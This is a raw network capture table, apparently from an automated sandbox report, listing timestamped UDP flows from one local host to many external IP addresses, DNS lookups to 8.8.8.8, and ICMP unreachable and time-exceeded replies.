                                                                                                        Jan 6, 2021 14:57:45.438215017 CET141656881192.168.2.20212.129.33.59
                                                                                                        Jan 6, 2021 14:57:45.439794064 CET5665453192.168.2.208.8.8.8
                                                                                                        Jan 6, 2021 14:57:45.487713099 CET53566548.8.8.8192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.487946987 CET141656881192.168.2.2067.215.246.10
                                                                                                        Jan 6, 2021 14:57:45.489500046 CET3840253192.168.2.208.8.8.8
                                                                                                        Jan 6, 2021 14:57:45.494016886 CET68811416587.98.162.88192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.540313959 CET53384028.8.8.8192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.540674925 CET141656881192.168.2.2082.221.103.244
                                                                                                        Jan 6, 2021 14:57:45.542176008 CET5679553192.168.2.208.8.8.8
                                                                                                        Jan 6, 2021 14:57:45.593162060 CET53567958.8.8.8192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.593430042 CET141656881192.168.2.20130.239.18.159
                                                                                                        Jan 6, 2021 14:57:45.594065905 CET141656881192.168.2.20212.129.33.59
                                                                                                        Jan 6, 2021 14:57:45.594201088 CET141656881192.168.2.2082.221.103.244
                                                                                                        Jan 6, 2021 14:57:45.594207048 CET141656881192.168.2.20130.239.18.159
                                                                                                        Jan 6, 2021 14:57:45.594297886 CET141656881192.168.2.2087.98.162.88
                                                                                                        Jan 6, 2021 14:57:45.598326921 CET141656881192.168.2.2087.98.162.88
                                                                                                        Jan 6, 2021 14:57:45.632220984 CET68811416582.221.103.244192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.632910967 CET141656881192.168.2.2087.98.162.88
                                                                                                        Jan 6, 2021 14:57:45.647206068 CET68811416587.98.162.88192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.647631884 CET141656881192.168.2.2087.98.162.88
                                                                                                        Jan 6, 2021 14:57:45.652825117 CET68811416587.98.162.88192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.654570103 CET1416550000192.168.2.20144.76.218.174
                                                                                                        Jan 6, 2021 14:57:45.663414955 CET688114165130.239.18.159192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.663918018 CET141656881192.168.2.2082.221.103.244
                                                                                                        Jan 6, 2021 14:57:45.663964987 CET688114165130.239.18.159192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.664343119 CET141656881192.168.2.2082.221.103.244
                                                                                                        Jan 6, 2021 14:57:45.681453943 CET68811416567.215.246.10192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.681816101 CET141656881192.168.2.20130.239.18.159
                                                                                                        Jan 6, 2021 14:57:45.685584068 CET68811416582.221.103.244192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.686028004 CET141656881192.168.2.2087.98.162.88
                                                                                                        Jan 6, 2021 14:57:45.686470032 CET68811416587.98.162.88192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.687527895 CET1416550000192.168.2.20144.76.218.174
                                                                                                        Jan 6, 2021 14:57:45.700551987 CET68811416587.98.162.88192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.701611042 CET1416550000192.168.2.20144.76.218.174
                                                                                                        Jan 6, 2021 14:57:45.741861105 CET68811416587.98.162.88192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.742997885 CET1416550000192.168.2.20144.76.218.174
                                                                                                        Jan 6, 2021 14:57:45.751828909 CET688114165130.239.18.159192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.753171921 CET1416551413192.168.2.205.135.183.57
                                                                                                        Jan 6, 2021 14:57:45.755426884 CET68811416582.221.103.244192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.755853891 CET68811416582.221.103.244192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.757263899 CET141656012192.168.2.2099.22.6.187
                                                                                                        Jan 6, 2021 14:57:45.759042978 CET1416549063192.168.2.2082.131.58.127
                                                                                                        Jan 6, 2021 14:57:45.837117910 CET490631416582.131.58.127192.168.2.20
                                                                                                        Jan 6, 2021 14:57:45.838632107 CET141656881192.168.2.2059.97.173.122
                                                                                                        Jan 6, 2021 14:57:46.368324041 CET141658792192.168.2.20130.239.18.159
                                                                                                        Jan 6, 2021 14:57:46.438364983 CET879214165130.239.18.159192.168.2.20
                                                                                                        Jan 6, 2021 14:57:46.439454079 CET141651900192.168.2.20178.141.74.98
                                                                                                        Jan 6, 2021 14:57:46.796690941 CET141658896192.168.2.20130.239.18.159
                                                                                                        Jan 6, 2021 14:57:46.866730928 CET889614165130.239.18.159192.168.2.20
                                                                                                        Jan 6, 2021 14:57:46.868000031 CET1416547224192.168.2.20217.79.178.72
                                                                                                        Jan 6, 2021 14:57:46.954550028 CET190014165178.141.74.98192.168.2.20
                                                                                                        Jan 6, 2021 14:57:46.955796957 CET1416532229192.168.2.20101.0.54.175
                                                                                                        Jan 6, 2021 14:57:47.150031090 CET3222914165101.0.54.175192.168.2.20
                                                                                                        Jan 6, 2021 14:57:47.150721073 CET141653299192.168.2.20118.171.136.250
                                                                                                        Jan 6, 2021 14:57:47.504288912 CET1416522076192.168.2.2091.83.13.5
                                                                                                        Jan 6, 2021 14:57:47.597142935 CET220761416591.83.13.5192.168.2.20
                                                                                                        Jan 6, 2021 14:57:47.598447084 CET1416564398192.168.2.20188.156.71.127
                                                                                                        Jan 6, 2021 14:57:47.628634930 CET329914165118.171.136.250192.168.2.20
                                                                                                        Jan 6, 2021 14:57:47.629911900 CET1416548100192.168.2.20116.68.96.62
                                                                                                        Jan 6, 2021 14:57:47.762339115 CET6439814165188.156.71.127192.168.2.20
                                                                                                        Jan 6, 2021 14:57:47.763696909 CET1416564402192.168.2.20178.48.42.33
                                                                                                        Jan 6, 2021 14:57:47.823127031 CET4810014165116.68.96.62192.168.2.20
                                                                                                        Jan 6, 2021 14:57:47.824985027 CET141657381192.168.2.20203.115.73.130
                                                                                                        Jan 6, 2021 14:57:47.832192898 CET6440214165178.48.42.33192.168.2.20
                                                                                                        Jan 6, 2021 14:57:47.833456039 CET1416558779192.168.2.20185.45.198.199
                                                                                                        Jan 6, 2021 14:57:47.897655964 CET5877914165185.45.198.199192.168.2.20
                                                                                                        Jan 6, 2021 14:57:47.898989916 CET1416554856192.168.2.2046.107.143.67
                                                                                                        Jan 6, 2021 14:57:47.962450981 CET141656882192.168.2.2070.172.28.156
                                                                                                        Jan 6, 2021 14:57:47.967926979 CET548561416546.107.143.67192.168.2.20
                                                                                                        Jan 6, 2021 14:57:47.969158888 CET1416551417192.168.2.2062.165.245.101
                                                                                                        Jan 6, 2021 14:57:48.053625107 CET514171416562.165.245.101192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.054878950 CET1416523761192.168.2.201.34.110.74
                                                                                                        Jan 6, 2021 14:57:48.157540083 CET1416535344192.168.2.20179.7.192.34
                                                                                                        Jan 6, 2021 14:57:48.174570084 CET68821416570.172.28.156192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.175964117 CET1416532998192.168.2.2059.99.92.197
                                                                                                        Jan 6, 2021 14:57:48.261272907 CET738114165203.115.73.130192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.262579918 CET1416543567192.168.2.20116.68.96.145
                                                                                                        Jan 6, 2021 14:57:48.343875885 CET23761141651.34.110.74192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.345521927 CET141658080192.168.2.20117.202.68.123
                                                                                                        Jan 6, 2021 14:57:48.379250050 CET329981416559.99.92.197192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.413887024 CET3534414165179.7.192.34192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.460994005 CET141658723192.168.2.20130.239.18.159
                                                                                                        Jan 6, 2021 14:57:48.461394072 CET1416551413192.168.2.2089.178.169.178
                                                                                                        Jan 6, 2021 14:57:48.481502056 CET1416529821192.168.2.20136.169.11.65
                                                                                                        Jan 6, 2021 14:57:48.486855984 CET4356714165116.68.96.145192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.488213062 CET141655353192.168.2.20220.77.193.240
                                                                                                        Jan 6, 2021 14:57:48.531116962 CET872314165130.239.18.159192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.532469988 CET1416544822192.168.2.2094.19.84.187
                                                                                                        Jan 6, 2021 14:57:48.540435076 CET514131416589.178.169.178192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.541865110 CET141651027192.168.2.20186.33.123.71
                                                                                                        Jan 6, 2021 14:57:48.559787035 CET2982114165136.169.11.65192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.561147928 CET1416530350192.168.2.2037.214.17.49
                                                                                                        Jan 6, 2021 14:57:48.626296997 CET448221416594.19.84.187192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.627784014 CET1416553946192.168.2.20143.244.52.12
                                                                                                        Jan 6, 2021 14:57:48.711966991 CET808014165117.202.68.123192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.733421087 CET5394614165143.244.52.12192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.786744118 CET535314165220.77.193.240192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.795106888 CET1416539893192.168.2.20109.183.46.30
                                                                                                        Jan 6, 2021 14:57:48.795192957 CET1416550789192.168.2.202.84.1.222
                                                                                                        Jan 6, 2021 14:57:48.845144987 CET3989314165109.183.46.30192.168.2.20
                                                                                                        Jan 6, 2021 14:57:48.943569899 CET141658646192.168.2.20130.239.18.159
                                                                                                        Jan 6, 2021 14:57:48.943691015 CET1416547349192.168.2.20186.33.123.64
                                                                                                        Jan 6, 2021 14:57:49.013782024 CET864614165130.239.18.159192.168.2.20
                                                                                                        Jan 6, 2021 14:57:49.014430046 CET141658080192.168.2.20117.213.44.202
                                                                                                        Jan 6, 2021 14:57:49.222692966 CET4734914165186.33.123.64192.168.2.20
                                                                                                        Jan 6, 2021 14:57:49.223234892 CET141658080192.168.2.20117.192.224.19
                                                                                                        Jan 6, 2021 14:57:49.225332022 CET808014165117.213.44.202192.168.2.20
                                                                                                        Jan 6, 2021 14:57:49.225742102 CET141659166192.168.2.20118.47.195.195
                                                                                                        Jan 6, 2021 14:57:49.683942080 CET141658083192.168.2.20186.33.122.205
                                                                                                        Jan 6, 2021 14:57:50.028234959 CET916614165118.47.195.195192.168.2.20
                                                                                                        Jan 6, 2021 14:57:50.028846979 CET1416518221192.168.2.20117.215.212.106
                                                                                                        Jan 6, 2021 14:57:50.101839066 CET808314165186.33.122.205192.168.2.20
                                                                                                        Jan 6, 2021 14:57:50.103218079 CET141651027192.168.2.2059.97.171.140
                                                                                                        Jan 6, 2021 14:57:50.107547045 CET916614165118.47.195.195192.168.2.20
                                                                                                        Jan 6, 2021 14:57:50.108403921 CET141659166192.168.2.20118.47.195.195
                                                                                                        Jan 6, 2021 14:57:50.108515024 CET141658547192.168.2.20130.239.18.159
                                                                                                        Jan 6, 2021 14:57:50.178515911 CET854714165130.239.18.159192.168.2.20
                                                                                                        Jan 6, 2021 14:57:50.179840088 CET1416530301192.168.2.20217.211.51.143
                                                                                                        Jan 6, 2021 14:57:50.242305994 CET3030114165217.211.51.143192.168.2.20
                                                                                                        Jan 6, 2021 14:57:50.242819071 CET1416546372192.168.2.2059.20.31.84
                                                                                                        Jan 6, 2021 14:57:50.323120117 CET10271416559.97.171.140192.168.2.20
                                                                                                        Jan 6, 2021 14:57:50.324548006 CET1416545170192.168.2.20180.188.241.235
                                                                                                        Jan 6, 2021 14:57:50.536869049 CET4517014165180.188.241.235192.168.2.20
                                                                                                        Jan 6, 2021 14:57:50.537271976 CET1416542289192.168.2.20142.93.135.230
                                                                                                        Jan 6, 2021 14:57:50.792340994 CET1822114165117.215.212.106192.168.2.20
                                                                                                        Jan 6, 2021 14:57:50.886528015 CET141657090192.168.2.2078.72.231.120
                                                                                                        Jan 6, 2021 14:57:57.990075111 CET102714165186.33.123.71192.168.2.20
                                                                                                        Jan 6, 2021 14:57:57.991616964 CET141651900192.168.2.20178.141.218.127
                                                                                                        Jan 6, 2021 14:57:58.155831099 CET190014165178.141.218.127192.168.2.20
                                                                                                        Jan 6, 2021 14:57:58.156331062 CET141656881192.168.2.2079.138.25.68
                                                                                                        Jan 6, 2021 14:58:27.429244041 CET1416515215192.168.2.20113.20.107.142
                                                                                                        Jan 6, 2021 14:58:27.730175972 CET1521514165113.20.107.142192.168.2.20
                                                                                                        Jan 6, 2021 14:58:27.731523991 CET1416557065192.168.2.2069.92.67.36
                                                                                                        Jan 6, 2021 14:58:28.023046970 CET570651416569.92.67.36192.168.2.20
                                                                                                        Jan 6, 2021 14:58:28.023655891 CET1416512441192.168.2.20178.141.10.182
                                                                                                        Jan 6, 2021 14:58:28.120680094 CET1244114165178.141.10.182192.168.2.20
                                                                                                        Jan 6, 2021 14:58:28.121124029 CET141658081192.168.2.20173.63.104.87
                                                                                                        Jan 6, 2021 14:58:46.950159073 CET141651027192.168.2.20178.141.154.96
                                                                                                        Jan 6, 2021 14:58:47.166620970 CET102714165178.141.154.96192.168.2.20
                                                                                                        Jan 6, 2021 14:58:47.167124033 CET141658744192.168.2.20130.239.18.159
                                                                                                        Jan 6, 2021 14:58:47.237179995 CET874414165130.239.18.159192.168.2.20
                                                                                                        Jan 6, 2021 14:58:47.237823009 CET1416510347192.168.2.2085.174.197.100
                                                                                                        Jan 6, 2021 14:58:54.204344034 CET1416540356192.168.2.20178.122.114.84
                                                                                                        Jan 6, 2021 14:58:58.183428049 CET141656881192.168.2.20118.42.206.206
                                                                                                        Jan 6, 2021 14:58:58.519583941 CET688114165118.42.206.206192.168.2.20
                                                                                                        Jan 6, 2021 14:58:58.521055937 CET1416514845192.168.2.2085.159.48.146
                                                                                                        Jan 6, 2021 14:58:58.575558901 CET148451416585.159.48.146192.168.2.20
                                                                                                        Jan 6, 2021 14:58:58.576989889 CET1416546400192.168.2.20188.157.138.106
                                                                                                        Jan 6, 2021 14:58:58.648374081 CET4640014165188.157.138.106192.168.2.20
                                                                                                        Jan 6, 2021 14:58:58.648936987 CET1416526046192.168.2.20176.63.0.92
                                                                                                        Jan 6, 2021 14:58:58.717536926 CET2604614165176.63.0.92192.168.2.20
                                                                                                        Jan 6, 2021 14:58:58.717936993 CET1416555089192.168.2.2091.146.175.231
                                                                                                        Jan 6, 2021 14:58:58.801525116 CET550891416591.146.175.231192.168.2.20
                                                                                                        Jan 6, 2021 14:58:58.802011013 CET1416531801192.168.2.20178.74.49.200
                                                                                                        Jan 6, 2021 14:58:58.890646935 CET3180114165178.74.49.200192.168.2.20
                                                                                                        Jan 6, 2021 14:58:58.891227007 CET141657669192.168.2.2080.99.153.165
                                                                                                        Jan 6, 2021 14:58:58.971472979 CET76691416580.99.153.165192.168.2.20
                                                                                                        Jan 6, 2021 14:58:58.971986055 CET141659878192.168.2.20189.6.16.83
                                                                                                        Jan 6, 2021 14:58:59.222290039 CET987814165189.6.16.83192.168.2.20
                                                                                                        Jan 6, 2021 14:58:59.222878933 CET1416517988192.168.2.2027.60.96.22
                                                                                                        Jan 6, 2021 14:59:28.436220884 CET1416557445192.168.2.20211.227.96.15
                                                                                                        Jan 6, 2021 14:59:28.701345921 CET5744514165211.227.96.15192.168.2.20
                                                                                                        Jan 6, 2021 14:59:28.782923937 CET141659050192.168.2.20111.92.81.196
                                                                                                        Jan 6, 2021 14:59:29.087829113 CET905014165111.92.81.196192.168.2.20
                                                                                                        Jan 6, 2021 14:59:29.089531898 CET1416537762192.168.2.20180.94.170.166
                                                                                                        Jan 6, 2021 14:59:29.299614906 CET3776214165180.94.170.166192.168.2.20
                                                                                                        Jan 6, 2021 14:59:29.301213026 CET141656881192.168.2.2080.98.147.103
                                                                                                        Jan 6, 2021 14:59:29.376442909 CET68811416580.98.147.103192.168.2.20
                                                                                                        Jan 6, 2021 14:59:29.401551962 CET1416557898192.168.2.205.189.183.129
                                                                                                        Jan 6, 2021 14:59:29.452788115 CET57898141655.189.183.129192.168.2.20
                                                                                                        Jan 6, 2021 14:59:29.453346968 CET1416523516192.168.2.2046.107.59.14
                                                                                                        Jan 6, 2021 14:59:29.525434971 CET235161416546.107.59.14192.168.2.20
                                                                                                        Jan 6, 2021 14:59:29.526041985 CET1416526302192.168.2.2078.131.127.204
                                                                                                        Jan 6, 2021 14:59:29.622905970 CET263021416578.131.127.204192.168.2.20
                                                                                                        Jan 6, 2021 14:59:29.623461962 CET1416554201192.168.2.205.160.131.227
                                                                                                        Jan 6, 2021 14:59:29.782563925 CET54201141655.160.131.227192.168.2.20
                                                                                                        Jan 6, 2021 14:59:29.783198118 CET1416550004192.168.2.2024.90.241.64
                                                                                                        Jan 6, 2021 14:59:32.440474987 CET1416523260192.168.2.2081.249.182.231
                                                                                                        Jan 6, 2021 14:59:39.070451021 CET1416562035192.168.2.20188.156.134.49
                                                                                                        Jan 6, 2021 14:59:48.769526005 CET1416564613192.168.2.20176.63.31.193
                                                                                                        Jan 6, 2021 14:59:48.848757029 CET6461314165176.63.31.193192.168.2.20
                                                                                                        Jan 6, 2021 14:59:48.850219011 CET1416551413192.168.2.2094.21.221.121
                                                                                                        Jan 6, 2021 15:00:09.841169119 CET1416550844192.168.2.2092.249.162.242
                                                                                                        Jan 6, 2021 15:00:32.255239010 CET1416532993192.168.2.2062.77.144.95
                                                                                                        Jan 6, 2021 15:00:32.325289965 CET329931416562.77.144.95192.168.2.20
                                                                                                        Jan 6, 2021 15:00:32.325937986 CET1416551413192.168.2.2084.236.123.237
                                                                                                        Jan 6, 2021 15:00:32.416136980 CET514131416584.236.123.237192.168.2.20
                                                                                                        Jan 6, 2021 15:00:32.417401075 CET1416557468192.168.2.20106.222.107.1
                                                                                                        Jan 6, 2021 15:01:01.515089035 CET1416565510192.168.2.20193.226.227.130
                                                                                                        Jan 6, 2021 15:01:01.604049921 CET6551014165193.226.227.130192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.604559898 CET1416532149192.168.2.2080.98.22.37
                                                                                                        Jan 6, 2021 15:01:01.676628113 CET321491416580.98.22.37192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.677140951 CET1416554545192.168.2.20212.51.146.221
                                                                                                        Jan 6, 2021 15:01:01.724940062 CET5454514165212.51.146.221192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.725334883 CET1416551417192.168.2.20185.29.82.74
                                                                                                        Jan 6, 2021 15:01:01.810570955 CET5141714165185.29.82.74192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.810982943 CET141651329192.168.2.2087.229.77.177
                                                                                                        Jan 6, 2021 15:01:01.863886118 CET13291416587.229.77.177192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.864317894 CET1416539156192.168.2.2089.134.24.66
                                                                                                        Jan 6, 2021 15:01:01.947441101 CET391561416589.134.24.66192.168.2.20
                                                                                                        Jan 6, 2021 15:01:01.948854923 CET1416553835192.168.2.20178.164.217.57
                                                                                                        Jan 6, 2021 15:01:02.044925928 CET5383514165178.164.217.57192.168.2.20
                                                                                                        Jan 6, 2021 15:01:02.045474052 CET141652257192.168.2.2094.125.243.246
                                                                                                        Jan 6, 2021 15:01:08.809009075 CET1416564796192.168.2.2031.171.235.251
                                                                                                        Jan 6, 2021 15:01:08.875351906 CET647961416531.171.235.251192.168.2.20
                                                                                                        Jan 6, 2021 15:01:08.875880003 CET141656881192.168.2.20192.99.1.210
                                                                                                        Jan 6, 2021 15:01:09.009665012 CET688114165192.99.1.210192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.010077953 CET1416559222192.168.2.2098.251.39.207
                                                                                                        Jan 6, 2021 15:01:09.161405087 CET592221416598.251.39.207192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.161948919 CET1416551413192.168.2.2084.0.205.118
                                                                                                        Jan 6, 2021 15:01:09.224409103 CET514131416584.0.205.118192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.225684881 CET1416560076192.168.2.2080.99.30.246
                                                                                                        Jan 6, 2021 15:01:09.304646969 CET600761416580.99.30.246192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.305191994 CET1416527377192.168.2.2078.92.59.208
                                                                                                        Jan 6, 2021 15:01:09.366184950 CET273771416578.92.59.208192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.366735935 CET1416542313192.168.2.20178.48.169.142
                                                                                                        Jan 6, 2021 15:01:09.433509111 CET4231314165178.48.169.142192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.434088945 CET1416512143192.168.2.2088.123.129.99
                                                                                                        Jan 6, 2021 15:01:09.503544092 CET121431416588.123.129.99192.168.2.20
                                                                                                        Jan 6, 2021 15:01:09.504018068 CET1416552536192.168.2.20178.141.209.16
                                                                                                        Jan 6, 2021 15:01:12.824455023 CET5818953192.168.2.208.8.8.8
                                                                                                        Jan 6, 2021 15:01:12.824645996 CET3344653192.168.2.208.8.8.8
                                                                                                        Jan 6, 2021 15:01:12.872807980 CET53334468.8.8.8192.168.2.20
                                                                                                        Jan 6, 2021 15:01:12.875313997 CET53581898.8.8.8192.168.2.20
                                                                                                        Jan 6, 2021 15:01:31.190726995 CET1416530301192.168.2.20103.216.155.225

                                                                                                        ICMP Packets

                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                        Jan 6, 2021 14:57:29.197283030 CET131.221.67.202192.168.2.208709(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:29.197335005 CET131.221.67.202192.168.2.208709(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:29.197365999 CET131.221.67.202192.168.2.208709(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:32.489290953 CET83.163.237.112192.168.2.20e401(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:32.518594027 CET62.29.50.34192.168.2.20bd2e(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:57:32.618894100 CET173.182.213.7192.168.2.20e4f2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:33.115679979 CET58.160.249.135192.168.2.20db6b(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:35.093214035 CET121.134.134.1192.168.2.20fd5(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:57:35.445318937 CET46.165.139.60192.168.2.207544(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:35.531430960 CET195.229.0.147192.168.2.204e5b(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:35.576963902 CET38.104.123.122192.168.2.20e255(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:35.617697954 CET112.121.132.18192.168.2.20ac54(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:57:36.448600054 CET78.54.73.174192.168.2.209741(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:36.529036045 CET4.31.203.214192.168.2.204eec(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:36.909574986 CET122.3.241.158192.168.2.20ea9d(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:57:37.586987972 CET136.232.125.82192.168.2.20c0c(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:38.492311954 CET72.26.212.10192.168.2.202847(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:38.579458952 CET81.17.34.55192.168.2.201f79(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:38.598246098 CET67.187.218.82192.168.2.20ddd7(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:38.639816999 CET76.125.58.81192.168.2.20ebf6(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:38.656069994 CET186.200.255.130192.168.2.20f479(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:39.500792980 CET78.77.181.70192.168.2.20e348(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:57:39.607121944 CET10.104.240.38192.168.2.20e4af(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:39.626236916 CET173.240.48.5192.168.2.201f00(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:57:39.696119070 CET149.11.37.69192.168.2.206f1d(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:57:45.647073030 CET212.129.33.59192.168.2.20b5d2(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:45.928250074 CET99.22.6.187192.168.2.202a0b(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:46.789001942 CET114.31.200.89192.168.2.20c91a(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:57:46.998950005 CET94.140.74.213192.168.2.2031ae(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:57:56.492940903 CET81.92.108.157192.168.2.202f7e(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:56.537633896 CET194.30.140.66192.168.2.209f39(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:56.537677050 CET194.30.140.66192.168.2.209f39(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:56.702928066 CET112.189.51.14192.168.2.20e3d8(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:57:59.537589073 CET194.30.140.66192.168.2.209f39(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:00.488373995 CET77.190.174.8192.168.2.20ee65(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:00.716604948 CET58.159.213.117192.168.2.2021cd(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:58:01.492970943 CET37.134.148.1192.168.2.2079eb(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:03.600642920 CET64.201.64.18192.168.2.2041ee(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:03.600692034 CET64.201.64.18192.168.2.2041ee(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:03.635947943 CET76.167.21.18192.168.2.209395(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:03.695835114 CET216.129.149.170192.168.2.208a33(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:03.695877075 CET216.129.149.170192.168.2.208a33(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:03.695909023 CET216.129.149.170192.168.2.208a33(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:06.600512028 CET64.201.64.18192.168.2.2041ee(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:07.506230116 CET81.228.84.35192.168.2.20e827(Net unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:10.706145048 CET112.190.86.46192.168.2.20d915(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:22.535928011 CET80.140.241.117192.168.2.20e2ca(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:24.505547047 CET92.60.108.50192.168.2.2089e5(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:24.505603075 CET92.60.108.50192.168.2.2089e5(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:24.507540941 CET85.15.219.250192.168.2.20f7a2(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:25.512444019 CET80.232.163.10192.168.2.2026f9(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:25.512494087 CET80.232.163.10192.168.2.2026f9(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:25.512511015 CET80.232.163.10192.168.2.2026f9(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:27.509569883 CET92.60.108.50192.168.2.2089e5(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:31.774382114 CET152.255.144.50192.168.2.203938(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:58:38.517549038 CET89.206.1.2192.168.2.20dc29(Time to live exceeded in transit)Time Exceeded
                                                                                                        Jan 6, 2021 14:58:40.130831003 CET96.110.232.66192.168.2.2035e6(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:41.195477009 CET73.112.12.197192.168.2.202529(Port unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:41.989790916 CET78.244.168.62192.168.2.20b71c(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:41.989828110 CET78.244.168.62192.168.2.20b71c(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:41.991394997 CET78.244.168.62192.168.2.20b71c(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:42.493771076 CET46.164.1.124192.168.2.2053a2(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:45.613037109 CET185.181.181.25192.168.2.202eb0(Unknown)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:45.703691959 CET187.120.76.2192.168.2.2023d(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:45.703732967 CET187.120.76.2192.168.2.2023d(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:45.734426975 CET211.110.89.170192.168.2.2053aa(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:45.734457016 CET211.110.89.170192.168.2.2053aa(Host unreachable)Destination Unreachable
                                                                                                        Jan 6, 2021 14:58:45.734466076 CET211.110.89.170192.168.2.2053aa(Host unreachable)Destination Unreachable
